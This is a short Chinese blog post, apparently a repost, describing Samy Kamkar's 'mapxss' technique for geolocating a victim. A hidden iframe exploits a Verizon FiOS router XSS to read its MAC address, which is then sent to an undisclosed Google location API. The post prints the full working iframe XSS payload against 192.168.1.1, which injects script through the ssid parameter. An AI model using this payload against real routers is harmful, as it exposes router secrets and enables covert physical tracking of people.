跨省追捕专用API啊。。。。

演示地址：http://www.samy.pl/mapxss/

先诱惑目标访问一个XSS，跨了wifi包含mac地址的一个页面（当然是跨默认密码），比如原作者发现的Verizon FiOS Router的XSS：

<iframe style="display:none" src="http://192.168.1.1/index.cgi?active_page=9098&req_mode=0&mimic_button_field=goto%3a+9098..&button_value=9098&ssid=samy%22%3E%3Cscript%3Ealert%28document.body.innerHTML.substr%28document.body.innerHTML.indexOf%28%27wep_key_edit%22%20v%27%29%2b21,10%29%29;%3C/script%3E"></iframe> 

然后通过ajax获得mac地址并传输到Google Location Services这个未公开API

作者说这个API水他嗅探Firefox的Geolocation请求发现的。

还好Google搜集wifi的小车似乎没有在大陆来过？

via